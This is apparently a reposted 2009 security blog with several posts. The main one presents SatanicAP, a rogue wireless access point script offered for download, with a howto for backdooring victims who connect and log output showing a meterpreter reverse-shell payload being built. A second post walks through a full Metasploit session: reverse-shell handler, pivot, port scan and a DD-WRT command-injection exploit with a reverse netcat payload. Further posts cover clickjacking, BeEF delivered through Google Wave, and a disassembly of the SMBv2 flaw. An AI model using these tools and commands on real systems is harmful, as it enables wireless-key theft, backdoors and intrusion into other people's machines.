Longjidin's Kg Lengkong to Bukit Lada

SatanicAP (Karmetasploit+WKG+FakeAP+VNCBackdoor)

longjidin — Mon, 02 Nov 2009 14:46:22 +0000

Hi everybody

The satanic AP is finished. Like the name already says, it’s an evil wireless access point. It combines Karmetasploit, Wireless Key Viewer (wkg) by hm2075, FakeAP with sbd by g0tmilk and VNC backdooring in one script (everything is done with meterpreter…).

Some important things:

- The hole script works for my IBM T43p/atheros wireless card/BT4 pre final as attacker

- The victim is Windows Vista on a Lenovo T400 with Antivir

- The WLan AP is horribly slow. Maybe it’s the mtu size, maybe not.

- There are a lot of variables which are exported at the beginning of the script, but you can change nearly everything to your needs

- You don’t need to download the programms/exes i use, you can compile/download them yourself if you don’t trust my executables:

— wkv.exe – Wireless Key View by nirsoft (maybe i modified some bits in my version), Password Recovery Tools for Windows

— sbd.exe is already on BT. I don’t use another one.

— vncbackdoor.exe -> follow pureh@tes tutorial on windows backdoor part 1 and Uploading a windows vnc backdoor part 2 , the new version of ultraVNC changed, you don’t have to do the registry stuff but pack the .ini file into the exe and run winvnc.exe -run instead of -reinstall. But that’s another story.

— fDNS is available on DNSpenTest | Get DNSpenTest at SourceForge.net

- SatanicAP can be run in five different modes:

— 0 = Karmetasploit

— 1 = Wireless Key Grabber by hm2075

— 2 = FakeAP by g0tmilk – You have to shut down your Antivirus on Windows Victim!

— 3 = Wireless Key Grabber (1) and FakeAP (2) together – Shut down Antivirus!

— 4 = UltraVNC Backdoor instead of SBD – Shut down Antivirus (and allow VNC on Win Firewall)!

— 5 = Wireless Key Grabber (1) and VNC Backdoor (4) – Shut down Antivirus (and allow VNC on Win Firewall)!

- I only implemented VNC to proof that it’s very easy to extend the script. It took about 10 lines of code

- I commented out the autometer script because i was too lazy to fix it

Here’s the script only: Uploadingit.com | Downloading File: satanicAP.sh

Here’s the script including programs/exes: Uploadingit.com | Downloading File: satanicAP.tar.gz

Here’s the howto (as short/simple as possible):

1. backup dhcpd.conf

Code:

cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak

2. Change into /root/ folder

Code:

cd /root/

3. Download Uploadingit.com | Downloading File: satanicAP.tar.gz and extract it into /root/

Code:

cd /root/
tar -zxf satanicAP.tar.gz
cd ./SAP

4. Read satanicAP.sh script to understand what it does!

5. Go through the export statements at the beginning of the script and change them to your needs. Leave everything you don’t understand

6. Make executable

Code:

chmod +x satanicAP.sh

7. Run it the first time and read its output

Code:

./satanicAP.sh

8. Start Karmetasploit and read its output

Code:

./satanicAP.sh 0 0

9. Connect with a Windows Machine to the AP and open up a browser (mine was not vulnerable)

10. Back in Backtrack you can test other combinations:

Code:

./satanicAP.sh 1 1

11. Disconnect and Reconnect again with the Windows Machine, open up a browser and go to Google or www.uezdfedjw.net, download the mentioned exe file from the “fon” page and execute it. On the Backtrack machine you will see Metasploit starting the “Sending Stage”. It takes about 1 minute in my lab. With vnc it takes much longer, because the vncbackdoor.exe is bigger.

12. Here is the output of the script after a successfull execution (example for ./satanicAP 5 0):

Code:

root@floyd:~/SAP# ./satanicAP.sh 5 0
[+] Satanic AP by floyd fuh
[+] Cleaning up befor I begin
Site Satanic_AP disabled.
Run '/etc/init.d/apache2 reload' to activate new configuration!
Stopping web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:09:56 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
 ... waiting .

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
mon0            Atheros         ath5k - [phy0] (removed)

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode disabled)

[+] Making dirs
mkdir: cannot create directory `/root/SAP': File exists
mkdir: cannot create directory `/root/SAP/www': File exists
mkdir: cannot create directory `/root/SAP/payload': File exists
mkdir: cannot create directory `/root/SAP/tools': File exists
mkdir: cannot create directory `/root/SAP/tools/dns_spoof': File exists
[+] Killing wicd
Stopping Network connection manager: wicd.
wicd-client: no process killed
[+] Starting Monitor Mode

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
8117    dhclient

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)

[+] Changing MAC of mon0 to 00:10:23:A2:F2:83
Current MAC: 00:1X:aX:3X:X5:X1 (unknown)
Faked MAC:   00:10:23:a2:f2:83 (Flowwise Networks, Inc.)
[+] Writing /etc/dhcp3/dhcpd.conf
[+] Setting up AP
[+] Sleeping to wait for interface
[+] Starting apache
Starting web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:10:07 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
.
[+] Setting up VirtualHost config for Satanic AP
[+] Disabling Apache2 site default, enabling Satanic_AP
Site default already disabled
Enabling site Satanic_AP.
Run '/etc/init.d/apache2 reload' to activate new configuration!
[+] Reloading Apache2
Reloading web server config: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
.
[+] Compile payload fon_access_2.7.exe (reverse tcp shell)
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 272
Options: LHOST=10.0.0.1,LPORT=5555
[+] Writing proof file
[+] Writing common proof file script
[+] Writing FakeAP script
[+] Copying the second payload vncbackdoor.exe/sbd.exe to sys32.exe
[+] Writing Metasploit script
[+] Starting Metasploit
[+] Setting up interfaces and iptables
[+] Starting DHCP
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 13 leases to leases file.
Listening on LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on   LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
[+] Starting DNS Spoof
[+] You probably have to connect to 10.0.0.100::1050
[+] The password is satanicAPConnect
For further explanation watch pureh@tes http://blip.tv/file/577132
as well as http://uploads.blip.tv/file/577932 . The new version of UltaVNC uses
a .ini file instead of registry and you just have to winvnc.exe -run instead of
winvnc.exe -reinstall.
[+] Satanic AP over and out. floyd fuh

Thanks to bro Floyd from remote-exploit forum for this script

http://forums.remote-exploit.org/wireless/27147-satanicap-karmetasploit-wkg-fakeap-vncbackdoor-2.html

RATS – Rough Auditing Tool for Security

longjidin — Mon, 02 Nov 2009 12:59:01 +0000

RATS – Rough Auditing Tool for Security – is an open source tool developed and maintained by Secure Software security engineers. Secure Software was acquired by Fortify Software, Inc. RATS is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions.

RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with describing the problem, and potentially suggest remedies. It also provides a relative assessment of the potential severity of each problem, to better help an auditor prioritize. This tool also performs some basic analysis to try to rule out conditions that are obviously not problems.

As its name implies, the tool performs only a rough analysis of source code. It will not find every error and will also find things that are not errors. Manual inspection of your code is still necessary, but greatly aided with this tool.

Requirements

RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify –with-expat-lib and –with-expat-include options to configure so that it can find your installation of the library and header. Expat can be found here.

You can download RATS here:

Source Code: rats-2.3.tar.gz

Windows Binary: rats-2.3-win32.zip

Or read more here.

The Dangers of Clickjacking with Facebook

longjidin — Sun, 01 Nov 2009 07:55:57 +0000

Clickjacking is an admittedly difficult problem to solve entirely, though I question why invisible iframes are necessary. Still, a few techniques to combat the attack exist, such as frame-busting scripts. Twitter implemented this approach after a proof-of-concept attack circulated earlier this year, at the time, several researchers speculated on the ramifications for other sites, such as Facebook.

I’ve noted previously that authorizing a Facebook application requires only a single click, even if you’ve exempted your profile from the Facebook Platform. After noticing another possible clickjacking attack vector, I began compiling a list of single-click actions that should give any Facebook user pause. All of the following actions can be mistakenly performed by a user simply clicking a link or button on an innocent-looking page via clickjacking:

Authorize a malicious application. This can happen regardless of any privacy settings. On authorization, an application can immediately access your profile information, your photos, your posted links, your notes, your status updates, etc. It can also send notifications to your profile, send notifications to other people (anonymously or from you), and post feed stories to your wall, all with links included. Note that under default privacy settings, an application can access most of your data if a friend of yours falls prey to this type of attack.
Authorize a legitimate application with a cross-site scripting exploit. Most applications vulnerable to such an attack allow for clickjacking installs, where a single click authorizes the application and then forwards a user to an infected application page. That landing page can then execute any of the actions listed above for a malicious application. Note that if a friend falls for this attack and you have authorized the application, all of your data is vulnerable as well.
Post a link to your profile. This is possible by applying clickjacking to several Facebook pages used for sharing content. A custom title and description can be set for the link. Other content, such as a Flash video, can also be posted this way.
Publish a feed story from a malicious application. Note that this can work regardless of whether you have authorized the application. Applications may publish feed stories prior without authorization by a single click, though this does not grant them access to a user’s data. The feed story may include images, descriptive text, and links. The application can also pre-populate the user’s comments on the story, which would then be submitted upon execution of the clickjacking attack.
Send a message to another user. The recipient, subject, and message content, including links, can all be pre-populated. This no longer gives the recipient more access to data than usual, but could still be easily used to spread malware.
Send a friend request to another user. This means that a victim could unknowingly send a friend request to a malicious attacker’s profile, and the attacker would simply need to approve the request to gain access to everything on a user’s profile that their friends can access by default.
Harvest a user’s post_form_id. Those familiar with Facebook’s code will realize how serious this issue is. However, exploiting a post_form_id also requires knowing a user’s Facebook ID, and so far this attack does not provide the latter.

This list is not simply theoretical – I did some simple testing to make sure that each of these attacks worked. I also would not pretend that my list is exhaustive, and I would welcome any additions from other researchers.

Most of these are already known or fairly trivial to figure out. I am not aware of anyone reporting my method for the last attack, however, and I will be reporting the details of it to Facebook, as I believe it involves a code issue that can be patched apart from any clickjacking protection. Update: Facebook pushed a fix last night which I’ve confirmed. The hole came from a dialog page that one could load via a POST request. Outside its normal context, clicking the submit button on the page would forward a user back to the referring page but with the post_form_id appended.

I hope this list will help raise awareness of the potential dangers of clickjacking. Creating a Facebook version of Twitter’s “don’t click” worm would be fairly simple, and as this list indicates, one could do far more than simply post a link in the process.

Web Application Security Consortium (WASC) 2008 Statistics Published

longjidin — Sun, 01 Nov 2009 07:28:47 +0000

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape. We ascertain which classes of attacks are the most prevalent regardless of the methodology used to identify them. Industry statistics such as those compiled by Mitre CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications, this project tries to be the equivalent for custom web applications.

Goals

Identify the prevalence and probability of different vulnerability classes.
Compare testing methodologies against what types of vulnerabilities they are likely to identify.

The statistics was compiled from web application security assessment projects which were made by the following companies in 2008 (in alphabetic order):

Blueinfy
Cenzic with Hailstorm
DNS with WebInspect
Encription Limited
HP Application Security Center with WebInspect
Positive Technologies with MaxPatrol
Veracode with Veracode Security Review
WhiteHat Security with WhiteHat Sentinel

The statistics includes data about 12186 sites with 97554 detected vulnerabilities. The report contains Web application vulnerability statistics which was collected during penetration testing, security audits and other activities made by companies which were members of WASC in 2008. The statistics includes data about 12186 sites with 97554 detected vulnerabilities.

You can find the full study here:

Web Application Security Statistics

www.darknet.org.uk

Google Wave as a Tool for Hacking

longjidin — Sun, 01 Nov 2009 07:15:03 +0000

Many security researchers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the “zombie” machine.

After noting potential security issues with the gadgets in Google Wave, I set about to finally setup a BeEF testbed and see if Google Wave was as capable a platform for malware delivery as I suspected.

Example of a BeEF zombie spawned via Google Wave

The picture above shows the results. I successfully created a Google Wave gadget that creates a new BeEF zombie whenever someone views the wave. This does not allow for the keylogger function of BeEF, but I did send an alert dialog (as shown) and used the Chrome DoS function to crash the browser tab. (I could also detect that the zombie machine had Flash installed – imagine the possibilities of using Flash or PDF exploits in an auto-loaded gadget.)

What’s even more disconcerting is that BeEF can integrate with Metasploit to potentially take over a victim’s machine. I do not currently have Metasploit setup to test using Autopwn, but based on my experiences so far, I’m fairly confident such an attack would succeed.

All of these demonstrations about security and Google Wave point to four general weaknesses in Wave’s current structure:

Allowing scripts and iframes in gadgets with no limits apart from sandboxing
Lack of control over what content or users can be added to a wave
No simple mechanism for verifying gadget sources or features
Automatically loading gadgets when a wave is viewed

Any one of these issues would be cause for concern, but taken together they present such alarming possibilities as a user getting their computer hacked simply by viewing a wave. Whatever may be said about Google Wave’s usefulness, I have to conclude that the product is not ready for prime time until these types of problems are addressed.

from http://theharmonyguy.com

Using Metasploit DD-WRT Exploit Module Thru Pivot

longjidin — Sun, 11 Oct 2009 10:29:20 +0000

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it. In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:

msf > ifconfig eth0
[*] exec: ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62
          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0
          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)
          Interrupt:20
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)
msf exploit(handler) > session -i 1
[-] Unknown command: session.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo 
Computer: AWINXP01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > execute -H -f -c -i -f cmd.exe
Process 1708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.111.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.111.2
C:\Documents and Settings\administrator\Desktop>exit
meterpreter >

Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:

meterpreter >
Background session 1? [y/N]
msf exploit(handler) >
msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.111.0      255.255.255.0      Session 1
msf exploit(handler) >

Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > info
       Name: TCP Port Scanner
    Version: 6823
    License: Metasploit Framework License (BSD)
Provided by:
  hdm 
  kris katterjohn 
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS                    yes       The target address range or CIDR identifier
  THREADS  1                yes       The number of concurrent threads
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds
Description:
  Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443
PORTS => 22,23,80,443
msf auxiliary(tcp) > set RHOSTS 192.168.111.2
RHOSTS => 192.168.111.2
msf auxiliary(tcp) > run
[*]  TCP OPEN 192.168.111.2:22
[*]  TCP OPEN 192.168.111.2:23
[*]  TCP OPEN 192.168.111.2:80
[*] Auxiliary module execution completed
msf exploit(handler) >

Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:

msf exploit(handler) > connect -c 1 192.168.111.2 23
[*] Connected to 192.168.111.2:23
DD-WRT v24 std (c) 2007 NewMedia-NET GmbH
Release: 01/26/07 (SVN revision: 5660M)
�
DD-WRTx86CI login: ^Cmsf exploit(handler) >
msf exploit(handler) >

As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 2222
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2
RHOST => 192.168.111.2
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.

For more information on this vulnerability please check the following links:

http://www.securityfocus.com/bid/35742
http://www.milw0rm.com/exploits/9209

Static Binary Analysis of Recent SMBv2 Vulnerability

longjidin — Fri, 09 Oct 2009 01:52:40 +0000

The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in the past few weeks. We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis. With the release of Stephen Fewer’s Metasploit module to exploit this vulnerability, technical details of the vulnerability are now publicly available.Our analysis was limited to static binary analysis of srv2.sys and srvnet.sys.

The crash occurs within Smb2ValidateProviderCallback(PVOID DestinationBuffer):

.text:00017745

.text:00017745 loc_17745:

.text:00017745 movzx   eax, word ptr [esi+0Ch]

.text:00017749 mov     eax, _ValidateRoutines[eax*4]

.text:00017750 test    eax, eax

.text:00017752 jnz     short loc_1775B

This code is accessing an array of function pointers using a user-supplied index. This function pointer is then called here:

.text:0001775B

.text:0001775B loc_1775B:

.text:0001775B push    ebx

.text:0001775C call    eax ; Smb2ValidateNegotiate(x) ; Smb2ValidateNegotiate

The table consists of 19 function pointers, which seem to validate requests prior to actually executing them.

.data:0002D270 _ValidateRoutines dd offset _Smb2ValidateNegotiate@4

.data:0002D270                                         ; DATA XREF: Smb2ValidateProviderCallback(x)+4EA r

.data:0002D270                                         ; Smb2ValidateNegotiate(x)

.data:0002D274                 dd offset _Smb2ValidateSessionSetup@4 ; Smb2ValidateSessionSetup(x)

.data:0002D278                 dd offset _Smb2ValidateLogoff@4 ; Smb2ValidateLogoff(x)

.data:0002D27C                 dd offset _Smb2ValidateTreeConnect@4 ; Smb2ValidateTreeConnect(x)

.data:0002D280                 dd offset _Smb2ValidateTreeDisconnect@4 ; Smb2ValidateTreeDisconnect(x)

.data:0002D284                 dd offset _Smb2ValidateCreate@4 ; Smb2ValidateCreate(x)

.data:0002D288                 dd offset _Smb2ValidateClose@4 ; Smb2ValidateClose(x)

.data:0002D28C                 dd offset _Smb2ValidateFlush@4 ; Smb2ValidateFlush(x)

.data:0002D290                 dd offset _Smb2ValidateRead@4 ; Smb2ValidateRead(x)

.data:0002D294                 dd offset _Smb2ValidateWrite@4 ; Smb2ValidateWrite(x)

.data:0002D298                 dd offset _Smb2ValidateLock@4 ; Smb2ValidateLock(x)

.data:0002D29C                 dd offset _Smb2ValidateIoctl@4 ; Smb2ValidateIoctl(x)

.data:0002D2A0                 dd offset _Smb2ValidateCancel@4 ; Smb2ValidateCancel(x)

.data:0002D2A4                 dd offset _Smb2ValidateEcho@4 ; Smb2ValidateEcho(x)

.data:0002D2A8                 dd offset _Smb2ValidateQueryDirectory@4 ; Smb2ValidateQueryDirectory(x)

.data:0002D2AC                 dd offset _Smb2ValidateChangeNotify@4 ; Smb2ValidateChangeNotify(x)

.data:0002D2B0                 dd offset _Smb2ValidateQueryInfo@4 ; Smb2ValidateQueryInfo(x)

.data:0002D2B4                 dd offset _Smb2ValidateSetInfo@4 ; Smb2ValidateSetInfo(x)

.data:0002D2B8                 dd offset _Smb2ValidateOplockBreak@4 ; Smb2ValidateOplockBreak(x)

When the driver is first loaded, it initializes a series of structures that are responsible for registering the driver. One of the first steps that occurs is registering a series of callbacks:

PAGE:0002EFCF push    offset _SrvNetProvider

PAGE:0002EFD4 lea     eax, [ebp+DestinationString]

PAGE:0002EFD7 push    eax

PAGE:0002EFD8 mov     [ebp+var_14], offset _SrvConnectHandler@16 ; SrvConnectHandler(x,x,x,x)

PAGE:0002EFDF mov     [ebp+var_C], offset _SrvDisconnectHandler@12 ; SrvDisconnectHandler(x,x,x)

PAGE:0002EFE6 mov     [ebp+var_10], offset _SrvReceiveHandler@36 ; SrvReceiveHandler(x,x,x,x,x,x,x,x,x)

PAGE:0002EFED mov     [ebp+var_18], offset _SrvNegotiateHandler@16 ; SrvNegotiateHandler(x,x,x,x)

PAGE:0002EFF4 mov     [ebp+var_20], offset _SrvRegisterEndpoint@28 ; SrvRegisterEndpoint(x,x,x,x,x,x,x)

PAGE:0002EFFB mov     [ebp+var_1C], offset _SrvDeregisterEndpoint@12 ; SrvDeregisterEndpoint(x,x,x)

PAGE:0002F002 mov     [ebp+var_8], offset _SrvCredentialHandler@16 ; SrvCredentialHandler(x,x,x,x)

PAGE:0002F009 call    _SrvNetRegisterClient@8 ; SrvNetRegisterClient(x,x)

srvnet.sys is another driver that exports the SrvNetRegisterClient() routine. The srvnet.sys routine modifies a device extension (http://msdn.microsoft.com/en-us/library/ms794734.aspx), which maintains some internal state on each driver that registers via SrvNetRegisterClient(). This object is allocated with a size of 0×160 bytes when srvnet.sys is loaded (From DriverLoad()):

INIT:00028180

INIT:00028180 loc_28180:

INIT:00028180 lea     eax, [ebp+DeviceObject]

INIT:00028183 push    eax             ; DeviceObject

INIT:00028184 push    0               ; Exclusive

INIT:00028186 push    100h            ; DeviceCharacteristics

INIT:0002818B push    14h             ; DeviceType

INIT:0002818D lea     eax, [ebp+DestinationString]

INIT:00028190 push    eax             ; DeviceName

INIT:00028191 push    160h            ; DeviceExtensionSize

INIT:00028196 push    [ebp+DriverObject] ; DriverObject

INIT:00028199 call    ds:__imp__IoCreateDevice@28 ; IoCreateDevice(x,x,x,x,x,x,x)

INIT:0002819F mov     esi, eax

INIT:000281A1 test    esi, esi

INIT:000281A3 jge     short loc_281DF

INIT:000281FD mov     eax, [ebp+DeviceObject]

INIT:00028200 mov     eax, [eax+DEVICE_OBJECT.DeviceExtension]

INIT:00028203 push    eax             ; Resource

INIT:00028204 mov     _SrvNetDeviceExtension, eax ; Store ptr to DeviceExtension in a global variable

Within the undocumented device extension, an array of no more than 4 pointers to objects created by SrvNetRegisterClient() is maintained. These objects are allocated at the start of SrvNetRegisterClient():

.text:00014BF9 push    6662534Ch       ; Tag

.text:00014BFE add     eax, 78h

.text:00014C01 push    eax             ; int

.text:00014C02 push    edi             ; PoolType

.text:00014C03 call    _SrvNetAllocatePoolWithTag@12 ; SrvNetAllocatePoolWithTag(x,x,x)

.text:00014C08 mov     ebx, eax

.text:00014C0A cmp     ebx,

The pointer to the object is then added at the end of the array in the device extension:

.text:00014D5B mov     ecx, _SrvNetDeviceExtension

.text:00014D61 mov     [ecx+esi*4+0DCh], ebx

Each of these objects contains the function pointers shown when srv2.sys calls SrvNetRegisterClient():

.text:00014C77 pop     ecx ; ECX = 9

.text:00014C78 lea     edi, [ebx+4Ch] ; EBX = DeviceExtension, ESI = arg_0 (pointer to base of function pointer list)

.text:00014C7B rep movsd ; move 9 DWORD objects from *ESI into *EDI

The array roughly looks like this:

0x4C : 8 byte LSA_UNICODE_STRING structure

0x54 : *SrvRegisterEndpoint()

0x58 : *SrvDeRegisterEndpoint()

0x5C : *SrvNegotiateHandler()

0x60 : *SrvConnectHandler()

0x64 : *SrvReceiveHandler()

.....

Later in srvnet.sys, these routines will be called, for example within SrvNetCommonReceiveHandler():

.text:00016477 loc_16477:

.text:00016477 movzx   eax, word ptr [ebp+var_8]

.text:0001647B mov     ecx, _SrvNetDeviceExtension

.text:00016481 lea     eax, [ecx+eax*4+0DCh]

.text:00016488 cmp     dword ptr [eax], 0

.text:0001648B jz      short loc_164B2

.text:00016495 push    [ebp+arg_14]

.text:00016498 mov     eax, [edi+70h]

.text:0001649B push    [ebp+arg_8]

.text:0001649E push    [ebp+arg_4]

.text:000164A1 push    dword ptr [ebx+eax*4+0CCh]

.text:000164A8 call    dword ptr [edi+5Ch] ; Call SrvNegotiateHandler() from DeviceExtension->CallbackArray

.text:000164AB test    eax, eax

.text:000164AD mov     [ebp+var_4], eax

.text:000164B0 jge     short loc_1

The negotiate handler performs some validation, the most important of which is this check:

.text:0001602B cmp byte ptr [eax+4], 72h ; EAX = SMB packet data
.text:0001602F jnz loc_160EC

This checks the second DWORD in the packet for the negotiate SMB command, which is 0×72. If this check fails, then the routine returns an error.

Continuing to follow the code down in SrvNetCommonReceiveHandler() inside of srvnet.sys, we see that shortly after the call to the SrvNegotiateHandler() callback, the pointer to SrvConnectHandler() is stored in a structure:

.text:000164BE

.text:000164BE loc_164BE:              ;

.text:000164BE lea     eax, [edi+60h]  ;

.text:000164C1 mov     [esi+16Ch], eax ; SrvConnectHandler()

.text:000164C7 mov     eax, [edi+70h]

.text:000164CA mov     eax, [ebx+eax*4+0CCh]

.text:000164D1 mov     [esi+0A8h], eax

.text:000164D7 mov     eax, _pSrv2TraceInfo

.text:000164DC test    byte ptr [eax+0Ch], 1

.text:000164E0 jz      short loc_165

This pointer is accessed again later within SrvNetCommandReceiveHandler():

.text:000165D0 mov     [ebp+var_14], ax

.text:000165D4 mov     eax, [esi+16Ch]

.text:000165DA push    ebx

.text:000165DB call    dword ptr [eax] ; SrvConnectHandler()

We then see it being used to call SrvReceiveHandler() shortly after:

.text:00016687 loc_16687:

.text:00016687 push    [ebp+arg_20]

.text:0001668A mov     eax, [esi+16Ch]

.text:00016690 push    [ebp+arg_1C]

.text:00016693 mov     dword ptr [esi+8], 3

.text:0001669A push    [ebp+arg_14]

.text:0001669D push    [ebp+arg_C]

.text:000166A0 push    [ebp+arg_8]

.text:000166A3 push    [ebp+arg_4]

.text:000166A6 push    [ebp+arg_10]

.text:000166A9 push    dword ptr [edi]

.text:000166AB push    dword ptr [esi+0A8h]

.text:000166B1 call    dword ptr [eax+4] ; SrvReceiveHandler()

This chain of function calls will be important when understanding how the data passes between the different routines in srv2.sys.

The srsv2.sys driver maintains an internal list of “service providers” that provide different services, including validation and execution. This list is initialized in DriverStart() by calling Smb2ProviderRegister(), which calls another routine, SrvRegisterProvider(), which maintains a global list of providers within the driver. The SrvRegisterProvider() routine takes the following structure in addition to a callback as arguments:

.text:0001235B ; int __stdcall Smb2ProviderRegister() .text:0001235B _Smb2ProviderRegister@0 proc

.text:0001235B push    2

.text:0001235D push    3050h

.text:00012362 push    offset _Smb2ValidateProviderCallback@4 ; Smb2ValidateProviderCallback(x)

.text:00012367 push    offset _Smb2ValidateProviderName ; "Smb2Validate"

.text:0001236C call    _SrvRegisterProvider@16 ; SrvRegisterProvider(x,x,x,x

_Smb2ValidateProviderName:

.data:0002D164 _Smb2ValidateProviderName dw 18h        ; DATA XREF: Smb2ProviderRegister()+C o

.data:0002D166                 dw 18h

.data:0002D168                 dd offset aSmb2validate ; "Smb2Validate"

The SrvRegisterProvider() routine is also responsible for the initialization of a 36-byte structure. I didn’t reverse engineer the entire structure, but there are a few important offsets noted in the comments:

.data:0002D138 _NullProvider   dw 0Ah                  ; DATA XREF: SrvInitializeProviderList() o

.data:0002D138                                         ; SrvCleanupProviderList()+D o

.data:0002D13A                 dw 0

.data:0002D13C                 dd 0DCh

.data:0002D140                 dw 24h

.data:0002D142                 dw 0

.data:0002D144                 dd 1

.data:0002D148                 dd offset _NullProviderName ; (struct ProviderName *)p_providerName

.data:0002D14C                 dd 0                    ; (struct Provider *)p_next

.data:0002D150                 db    0

.data:0002D151                 db    0

.data:0002D152                 db    0

.data:0002D153                 db    0

.data:0002D154                 dd 0FFFFFFFFh

.data:0002D158                 dd offset _NullProviderCallback@4 ; Provider callback routine

